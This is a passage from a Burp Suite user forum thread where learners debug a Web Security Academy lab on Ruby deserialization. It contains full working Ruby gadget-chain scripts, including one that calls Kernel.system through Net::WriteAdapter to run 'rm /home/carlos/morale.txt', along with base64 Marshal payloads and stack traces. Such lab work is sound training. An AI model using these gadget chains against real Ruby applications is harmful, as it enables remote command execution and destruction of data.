Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

No such file or directory error - ruby deserialization

Testsai | Last updated: Mar 25, 2022 09:01AM UTC

Hi, in the Exploiting Ruby deserialization using a documented gadget chain lab , when i change the session cookie to the malformed one from the ruby file's output, burp shows an error like this: /usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:116:in `initialize': No such file or directory @ rb_sysopen - |rm /home/carlos/morale.txt (Errno::ENOENT) Please help me with this issue

Uthman, PortSwigger Agent | Last updated: Mar 25, 2022 09:26AM UTC

Testsai | Last updated: Mar 25, 2022 09:43AM UTC

Hi, 1.I have opened the lab and logged in as wiener:peter and opened the home page. 2.I have sent the GET / request with session cookie to burp repeater and then executed the following ruby code: #!/usr/bin/env ruby class Gem::StubSpecification def initialize; end end stub_specification = Gem::StubSpecification.new stub_specification.instance_variable_set(:@loaded_from, "|rm /home/carlos/morale.txt") puts "STEP n" stub_specification.name rescue nil puts class Gem::Source::SpecificFile def initialize; end end specific_file = Gem::Source::SpecificFile.new specific_file.instance_variable_set(:@spec, stub_specification) other_specific_file = Gem::Source::SpecificFile.new puts "STEP n-1" specific_file <=> other_specific_file rescue nil puts $dependency_list= Gem::DependencyList.new $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) puts "STEP n-2" $dependency_list.each{} rescue nil puts class Gem::Requirement def marshal_dump [$dependency_list] end end payload = Marshal.dump(Gem::Requirement.new) puts "STEP n-3" Marshal.load(payload) rescue nil puts puts "VALIDATION (in fresh ruby process):" IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe| pipe.print payload pipe.close_write puts pipe.gets puts end puts "Payload (hex):" puts payload.unpack('H*')[0] puts require "base64" puts "Payload (Base64 encoded):" puts Base64.encode64(payload) 3. I got a base 64 string as follows which i have url encoded via decoder in burpsuite and replace url encoded one with the original session cookie: BAhVOhVHZW06OlJlcXVpcmVtZW50WwZvOhhHZW06OkRlcGVuZGVuY3lMaXN0 BzoLQHNwZWNzWwdvOh5HZW06OlNvdXJjZTo6U3BlY2lmaWNGaWxlBjoKQHNw ZWNvOhtHZW06OlN0dWJTcGVjaWZpY2F0aW9uBjoRQGxvYWRlZF9mcm9tSSIg fHJtIC9ob21lL2Nhcmxvcy9tb3JhbGUudHh0BjoGRVRvOwgAOhFAZGV2ZWxv cG1lbnRG 4. when i send the request it says no 500 internal error no such directory or file

Uthman, PortSwigger Agent | Last updated: Mar 25, 2022 10:02AM UTC

Hi Testsai,

That doesn't look like the correct code or base64 string, unfortunately.

There is a hint in the links in my initial reply above.

agash | Last updated: Mar 25, 2022 09:34PM UTC

same problem ,its my last exec and cant solve ,i spend more than 50 hours for this exec, i think some problem here

Liam, PortSwigger Agent | Last updated: Mar 28, 2022 07:09AM UTC

The lab is passing in our testing. Keep trying!

sapphire | Last updated: Apr 17, 2022 01:13PM UTC

same error, u didn't fix it still :( <h4>Internal Server Error</h4> <p class=is-warning>/usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:116:in `initialize&apos;: No such file or directory @ rb_sysopen - |rm /home/carlos/morale.txt (Errno::ENOENT) from /usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:116:in `open&apos; from /usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:116:in `data&apos; from /usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:158:in `name&apos; from /usr/lib/ruby/2.7.0/rubygems/source/specific_file.rb:65:in `&lt;=&gt;&apos; from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:219:in `sort&apos; from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:219:in `tsort_each_child&apos; from /usr/lib/ruby/2.7.0/tsort.rb:415:in `call&apos; from /usr/lib/ruby/2.7.0/tsort.rb:415:in `each_strongly_connected_component_from&apos; from /usr/lib/ruby/2.7.0/tsort.rb:349:in `block in each_strongly_connected_component&apos; from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:215:in `each&apos; from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:215:in `tsort_each_node&apos; from /usr/lib/ruby/2.7.0/tsort.rb:347:in `call&apos; from /usr/lib/ruby/2.7.0/tsort.rb:347:in `each_strongly_connected_component&apos; from /usr/lib/ruby/2.7.0/tsort.rb:281:in `each&apos; from /usr/lib/ruby/2.7.0/tsort.rb:281:in `to_a&apos; from /usr/lib/ruby/2.7.0/tsort.rb:281:in `strongly_connected_components&apos; from /usr/lib/ruby/2.7.0/tsort.rb:257:in `strongly_connected_components&apos; from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:77:in `dependency_order&apos; from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:100:in `each&apos; from /usr/lib/ruby/2.7.0/rubygems/requirement.rb:297:in `fix_syck_default_key_in_requirements&apos; from /usr/lib/ruby/2.7.0/rubygems/requirement.rb:207:in `marshal_load&apos; from -e:13:in `load&apos; from -e:13:in `&lt;main&gt;&apos; I was using script from: https://www.elttam.com/blog/ruby-deserialization/ and online_ruby_compiler https://www.onlinegdb.com/online_ruby_compiler pls fix it

amsdf | Last updated: Apr 17, 2022 09:54PM UTC

It seems that something has changed since the solution was written. There are several videos that document how this vulnerability was exploited in the past: - By Michael Sommer: https://www.youtube.com/watch?v=MGPM1TPXRo4 - By Bug Bounty España: https://www.youtube.com/watch?v=Rjl1cnw4Wek The payload resulting is as follows: BAhVOhVHZW06OlJlcXVpcmVtZW50WwZvOhhHZW06OkRlcGVuZGVuY3lMaXN0 BzoLQHNwZWNzWwdvOh5HZW06OlNvdXJjZTo6U3BlY2lmaWNGaWxlBjoKQHNw ZWNvOhtHZW06OlN0dWJTcGVjaWZpY2F0aW9uBjoRQGxvYWRlZF9mcm9tSSIg fHJtIC9ob21lL2Nhcmxvcy9tb3JhbGUudHh0BjoGRVRvOwgAOhFAZGV2ZWxv cG1lbnRG It is the same payload that the exploit is returning me using ruby 2.7.0 (same version as the lab as well) however it fails with a similar exception that sapphire posted. Either the lab is not working as intended or the solution has to be updated due to changes in the lab environment.

Sumit | Last updated: Apr 18, 2022 04:24AM UTC

Same error for me as well with same payload...

Uthman, PortSwigger Agent | Last updated: Apr 18, 2022 11:26AM UTC

Hi everyone,

Are you still seeing that the lab gets marked as 'Solved'?

Can you please share the full steps you are taking in your attempt to complete the lab (screen recording or clear step-by-step), your ruby code used to generate the payload, and the final base64 string in the session cookie?

Peyton | Last updated: Apr 18, 2022 02:06PM UTC

Unfortunately, the lab does not solve with the aforementioned code/payload. Steps are as follows: 1. Open the lab and log in as user wiener 2. Notice marshaled session cookie 3. Use following code at: https://www.onlinegdb.com/online_ruby_compiler #!/usr/bin/env ruby class Gem::StubSpecification def initialize; end end stub_specification = Gem::StubSpecification.new stub_specification.instance_variable_set(:@loaded_from, "|rm /home/carlos/morale.txt") puts "STEP n" stub_specification.name rescue nil puts class Gem::Source::SpecificFile def initialize; end end specific_file = Gem::Source::SpecificFile.new specific_file.instance_variable_set(:@spec, stub_specification) other_specific_file = Gem::Source::SpecificFile.new puts "STEP n-1" specific_file <=> other_specific_file rescue nil puts $dependency_list= Gem::DependencyList.new $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file]) puts "STEP n-2" $dependency_list.each{} rescue nil puts class Gem::Requirement def marshal_dump [$dependency_list] end end payload = Marshal.dump(Gem::Requirement.new) puts "STEP n-3" Marshal.load(payload) rescue nil puts puts "VALIDATION (in fresh ruby process):" IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe| pipe.print payload pipe.close_write puts pipe.gets puts end puts "Payload (hex):" puts payload.unpack('H*')[0] puts require "base64" puts "Payload (Base64 encoded):" puts Base64.encode64(payload) 4. BASE64 output for payload: BAhVOhVHZW06OlJlcXVpcmVtZW50WwZvOhhHZW06OkRlcGVuZGVuY3lMaXN0 BzoLQHNwZWNzWwdvOh5HZW06OlNvdXJjZTo6U3BlY2lmaWNGaWxlBjoKQHNw ZWNvOhtHZW06OlN0dWJTcGVjaWZpY2F0aW9uBjoRQGxvYWRlZF9mcm9tSSIg fHJtIC9ob21lL2Nhcmxvcy9tb3JhbGUudHh0BjoGRVRvOwgAOhFAZGV2ZWxv cG1lbnRG 5. Paste base64 payload in decoder tab in Burp Suite Professional 6. URL encode payload 7. With intercept ON, navigate home in the lab environment 8. Paste the URL encoded payload in the session cookie 9. Receive error as follows: Internal Server Error /usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:116:in `initialize': No such file or directory @ rb_sysopen - |rm /home/carlos/morale.txt (Errno::ENOENT) from /usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:116:in `open' from /usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:116:in `data' from /usr/lib/ruby/2.7.0/rubygems/stub_specification.rb:158:in `name' from /usr/lib/ruby/2.7.0/rubygems/source/specific_file.rb:65:in `<=>' from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:219:in `sort' from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:219:in `tsort_each_child' from /usr/lib/ruby/2.7.0/tsort.rb:415:in `call' from /usr/lib/ruby/2.7.0/tsort.rb:415:in `each_strongly_connected_component_from' from /usr/lib/ruby/2.7.0/tsort.rb:349:in `block in each_strongly_connected_component' from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:215:in `each' from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:215:in `tsort_each_node' from /usr/lib/ruby/2.7.0/tsort.rb:347:in `call' from /usr/lib/ruby/2.7.0/tsort.rb:347:in `each_strongly_connected_component' from /usr/lib/ruby/2.7.0/tsort.rb:281:in `each' from /usr/lib/ruby/2.7.0/tsort.rb:281:in `to_a' from /usr/lib/ruby/2.7.0/tsort.rb:281:in `strongly_connected_components' from /usr/lib/ruby/2.7.0/tsort.rb:257:in `strongly_connected_components' from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:77:in `dependency_order' from /usr/lib/ruby/2.7.0/rubygems/dependency_list.rb:100:in `each' from /usr/lib/ruby/2.7.0/rubygems/requirement.rb:297:in `fix_syck_default_key_in_requirements' from /usr/lib/ruby/2.7.0/rubygems/requirement.rb:207:in `marshal_load' from -e:13:in `load' from -e:13:in `<main>' NOTE: The payload has new line hex characters and wraps. This error persists regardless of if the payload is URL encoded or not, or if the new line hex characters are present.

Uthman, PortSwigger Agent | Last updated: Apr 18, 2022 03:14PM UTC

sapphire | Last updated: Apr 18, 2022 05:00PM UTC

Peyton have right. 1) We don't decode payload from script! If we encode URL this payload: BAhVOhVHZW06OlJlcXVpcmVtZW50WwZvOhhHZW06OkRlcGVuZGVuY3lMaXN0BzoLQHNwZWNzWwdvOh5HZW06OlNvdXJjZTo6U3BlY2lmaWNGaWxlBjoKQHNwZWNvOhtHZW06OlN0dWJTcGVjaWZpY2F0aW9uBjoRQGxvYWRlZF9mcm9tSSIgfHJtIC9ob21lL2Nhcmxvcy9tb3JhbGUudHh0BjoGRVRvOwgAOhFAZGV2ZWxvcG1lbnRG we don't get solved after cookies change. everything it's okey, you change something. Other solutions to this lab don't work. Update offical solution mby?

Peyton | Last updated: Apr 19, 2022 11:56AM UTC

The code segment he referenced works with some alterations. I won't give away too much but I would recommend giving it a read over and try to mess with the parameters identified in the previous gadget chains used. Thanks

Uthman, PortSwigger Agent | Last updated: Apr 19, 2022 05:37PM UTC

@sapphire, try this ruby code: 
Gem::SpecFetcher
Gem::Installer

module Gem
  class Requirement
    def marshal_dump
      [@requirements]
    end
  end
end

wa1 = Net::WriteAdapter.new(Kernel, :system) rescue nil

rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "ls")

wa2 = Net::WriteAdapter.new(rs, :resolve)

i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")


n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)

t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)

r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)

payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)
puts Base64.encode64(payload)

sapphire | Last updated: Apr 19, 2022 08:47PM UTC

That's correct code: Gem::SpecFetcher Gem::Installer module Gem class Requirement def marshal_dump [@requirements] end end end wa1 = Net::WriteAdapter.new(Kernel, :system) rescue nil rs = Gem::RequestSet.allocate rs.instance_variable_set('@sets', wa1) rs.instance_variable_set('@git_set', "rm /home/carlos/morale.txt") wa2 = Net::WriteAdapter.new(rs, :resolve) i = Gem::Package::TarReader::Entry.allocate i.instance_variable_set('@read', 0) i.instance_variable_set('@header', "aaa") n = Net::BufferedIO.allocate n.instance_variable_set('@io', i) n.instance_variable_set('@debug_output', wa2) t = Gem::Package::TarReader.allocate t.instance_variable_set('@io', n) r = Gem::Requirement.allocate r.instance_variable_set('@requirements', t) payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r]) require 'base64' puts Base64.encode64(payload) puts Base64.encode64(payload) Thanks for all the hints

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.